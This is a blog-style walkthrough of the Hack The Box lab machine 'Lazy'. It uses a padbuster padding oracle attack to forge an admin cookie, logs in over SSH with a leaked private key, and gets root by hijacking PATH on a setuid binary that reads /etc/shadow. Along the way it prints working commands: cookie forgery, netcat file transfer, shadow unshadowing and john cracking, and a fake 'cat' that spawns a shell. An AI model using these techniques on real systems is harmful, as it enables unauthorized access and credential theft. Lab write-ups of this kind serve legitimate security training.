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As always I start with a simple UP/Down scan on all TCP ports
$ nmap -T4 -p- -oX ./nmapb.xml lazy.htb
Then I convert that to HTML to make it pretty
xsltproc ./nmapb.xml -o nmapb.html

Just two ports open 22 and 80

Lets run nmap again with -A to run all the things
 nmap -T4 -A -p22,80 -oX ./nmapf.xml lazy.htb
And lets convert that to HTML too
$ xsltproc ./nmapf.xml -o ./nmapf.html

Looks like openssh 6.6.1p1
And Apache 2.4.7

That is a super old version of OpenSSH.

Let's check the website

Tried logging in as admin/admin
No dice

But it did let me register a user

Got an auth cookie

Check this out.. If we try to register the same name again….

We could theoretically use this to find out some user names on the system. I tried doing a hydra attack at it but  I couldn't get the syntax right for what I wanted it to do…. But I did add several hundred new users to the system :)


After a reset. I decided to take a harder look at our cookie we got earlier.

We caught the login in burp

We can see the cookie  50xBDBlHPSA9QwFhjMtuyBF2krAvOSat

And we see in the response we are logged in as the user we created homerj

I want to test if this might be susceptible to a oracle padding attack

If we change up the cookie value and get an error back about the padding being incorrect we can use that data leak to decrypt value and encode it with something else

I just added Simpson to the end of my cookie value

And we did get a invalid padding error message back so we can use a tool called padbuster to decrypt this hopefully you can clone the repo from here

And This blog walks you through the nuts and bolts of exactly how this attack works and give some examples of using padbuster to break the value.

$ ./ http://lazy.htb/login.php 50xBDBlHPSA9QwFhjMtuyBF2krAvOSat 8 -cookie auth=50xBDBlHPSA9QwFhjMtuyBF2krAvOSat -encoding 0

So here we are giving the 
url to test for valid padding against http://lazy.htb/login.php
The sample of encrypted value 50xBDBlHPSA9QwFhjMtuyBF2krAvOSa
THen we give the block size the cipher is using. I'm just guessing 8, could be 16 if this doesn't work
Then we give it the cookie's value -cookie auth=50xBDBlHPSA9QwFhjMtuyBF2krAvOSat

Lasty another guess we have to assume the encoding used here are our options with padbuster
  • 0: Base64 (default)
  • 1: Lowercase HEX ASCII
  • 2: Uppercase HEX ASCII
I guessed base64 so that is the last part  -encoding 0

Part way through the decoding we have a prompt to answer

Which of the IDs we want to proceed with.. It recommended 2 so that is what I chose

Eventually we get this back

It was able to decrypt user=homerj as ASCII using padding oracle attack.

Guess what if it can decrypt it… we can modify it with this tool too.

Very similar command
$ ./ http://lazy.htb/login.php 50xBDBlHPSA9QwFhjMtuyBF2krAvOSat 8 -cookie auth=50xBDBlHPSA9QwFhjMtuyBF2krAvOSat -encoding 0 -plaintext user=admin

We just need to add the plaintext of what we want the value to be in this case user=admin
 So just placing -plaintext user=admin at the end of the previous command will do that for us

Eventually we get this back

+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA

I'm going to just use the cookie editor extension I have loaded in firefox to change this value

Old value
Here is the new value

I'll hit save and reload the page

Bingo we got in as admin

And more importantly than that we get their SSH key

Let's save it to our kali box give it tighter permissions and and try to use this private key to connect to the ssh

But what about a username?

Well check out the name of the private key file

$ ssh -i ./privkey mitsos@lazy.htb

We got our shell!!!

The Simpsons Hello GIF

Let's see where we landed…

Oh there is the user hash

Let's get over to the box and see if we can find a path to escalation

On my kali box I just ran SimpleHTTPServer from the /opt/linux/linenum folder

mitsos@LazyClown:/tmp$ mkdir circusmonkey ; cd circusmonkey
mitsos@LazyClown:/tmp/circusmonkey$ wget

Gave execute rights to the script
Chmod +x ./
Didn't see anything that jumps out to me in the output.

Let's look back at the /home/mitsos folder

What is that file called backup?

Mmmkay its not a folder… but we can run it

It's an executable 

Since this isn't my machine let's run it and see what it does

Looks like it dumps out the shadow folder.

I saved that locally in a file called lazyshadow

Let's grab the /etc/passwd file too so we can unshadow this and feed it to john

Copied that out locally to a file named lazypasswd

Then run unshadow to format this list in a format john likes

$ sudo /usr/sbin/unshadow ./lazypasswd ./lazyshadow  > ./lazyunshadow

$ sudo john --wordlist=/home/circusmonkey/rockyou.txt ./lazyunshadow 

I literally let this run all night and it never got the hashes…

Let's take a look at that executable.

I used netcat to copy it over locally

On my local box

$ nc -lnvp 4444 > backup

On Lazy

 nc 4444 < /home/mitsos/backup 

This probably wasn't necessary but I wanted to check it out offline

I used the string command to see if there are any strings in the executable that we can read

Looks like it does exactly what we thought. It does it cats the /etc/shadow file.

Let's check the permissions on this file again

Its owned by root


If you not familiar with this syntax here is a great resource 

Basically this can be divided into three sections, three groups of three indicating who has what rights to the file

The first grouping is the rights of the owner of the file
The next grouping is for the members of a group that have permissions on the file
The final grouping is for others, meaning for any user that is not the owner or a member of the group

Normally you will see either a X, R or W in the groupings which mean

X = Execute - This user or group can execute the file
R = Read - this users or can read the file
W = Write - This user or group can write to this file, to change or modify it

In our example here we see another character added to the normal options you would see. This example has a S.

S is Setuid or Setgid ( depending on if its set at owner level or group level)
Again here is a resource if you are unfamilur
What it means to us is if the S is set on an executable, whoever can run the program, when they execute it the program will run as the owner of the file. So in this case if anyone can run this file it runs as root.


-rws The first dash here just indicates if this is a directory or link, if it were there would be a d or l in this place. So we will just ignore that

rws - Owner Can read,write and execute this file
rws - Group members can read,write and execute 
r-x  - Others can Read and Execute

So we are not root so we can ignore the first 3 characters in the permissions
We are also not members of the group root so we can ignore the second three characters

We are however an other, we are a user on this system.
So we can read and execute… and since the Setuid is present. When we run it we run it as root

Which is why when we run it it can cat out the /etc/shadow which we as mitsos doesn't have access to.

However we can't modify the file directly since we don't have write permissions.

Ok back to the interesting string we were able to pull from the executable

cat /etc/shadow

What we might do if we were able to manipulate the file itself is just change it to cat /roor/root.txt to get our root hash.

But what we can do here is take advantage of the the relative call to cat

We can simply change what cat means to the system.

If they had used /bin/cat /etc/shadow then this wouldn't work but since we can control the environment variables we can hijack cat to be something else.

The reason we can call cat without the absolute path is because we have defined /bin in our path environment variable.  We can check our environment variables by typing env

This is pretty standard on all Operating systems not just LInux windows also has an environment variable like this so we can run programs from \system32 without having to type the absolute path.

So we can change our path to include a folder we have ownership of and give it a cat that does something else instead of just reading out a file.

Here is another write up on this attack method

So we need create a new cat that launches a shell as the root user

Moving back to the /tmp/circusmonkey folder we created earlier
cd /tmp/circusmonkey/

We will create a new cat file here that just calls /bin/bash
echo "/bin/sh" > cat

Now we need to change the permissions here to give it execute rights for all users

chmod 777 ./cat 

Now we just need to add this /tmp/circusmonkey to the path environment variable

export PATH=/tmp/circusmonkey:$PATH

*** you can see I can't spell my own name here in this output*****

Now we just need to execute the backup executable again and hopefully it will us our newly created cat to give us root shell

I am root

Baby Groot Guardians Of The Galaxy Volume 2 GIF

Now we just need to get our hash.. Remember we screwed with the path environment variable and now we will have to use the absolute path for cat or we will just call our shell again.

# /bin/cat /root/root.txt

Season 3 Ash GIF by STARZ


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